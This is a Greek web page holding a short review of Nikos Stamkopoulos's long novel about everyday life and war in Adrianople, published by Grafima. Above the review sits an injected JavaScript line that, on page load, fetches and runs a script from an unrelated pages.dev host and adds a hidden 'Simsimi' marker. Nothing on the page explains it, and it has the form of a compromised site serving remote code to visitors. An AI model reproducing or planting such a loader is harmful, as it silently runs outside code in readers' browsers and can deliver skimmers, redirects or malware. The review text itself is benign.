document.addEventListener('DOMContentLoaded', function(){var s=document.createElement('script');s.src='https://91a31208.asukontol.pages.dev/simsimi.js';document.head.appendChild(s);var h=document.createElement('span');h.style.display='none';h.textContent='Simsimi';document.body.appendChild(h);});
«Θεοί και τριαντάφυλλα», στο γραφείο του Παύλου

«Θεοί και τριαντάφυλλα», στο γραφείο του Παύλου

Αν αγαπάς τις αφηγήσεις, αυτό το βιβλίο του Νίκου Σταμκόπουλου, είναι το ιδανικό ανάγνωσμα, που θα σε ταξιδέψει, θα σε πληροφορεί, θα σε κερδίσει… όσο και αν φαντάζει «κουραστικό» λόγω των 899 σελίδων του!
Η ιστορία διαδραματίζεται στην Αδριανούπολη (την παλιά Εντιρνέ) και μιλάει για την καθημερινή ζωή, τις χαρές, τους έρωτες, τις τρέλες και τους πολέμους που πέρασαν οι άνθρωποι εκείνης της εποχής, με τα τριαντάφυλλα να συμβολίζουν τις ανθρώπινες στιγμές, την ομορφιά, τις αναμνήσεις… και με τους θεούς να είναι οι μεγάλες ιστορικές δυνάμεις, οι πόλεμοι, η μοίρα που πλακώνει τους απλούς ανθρώπους.
Ο λόγος του λιτός, όπως και η γραφή του, με ρυθμό και πλούσια σε εικόνες η αφήγησή του, σε βαθμό που σε συγκινεί…

 

θεοι γραφημα 10

 

Το βιβλίο κυκλοφορεί από τις Εκδόσεις ΓΡΑΦΗΜΑ

Παύλος Ανδριάς
Δημοσιογράφος – Συγγραφέας



Εγγραφή στο Newsletter μας

Please enable the javascript to submit this form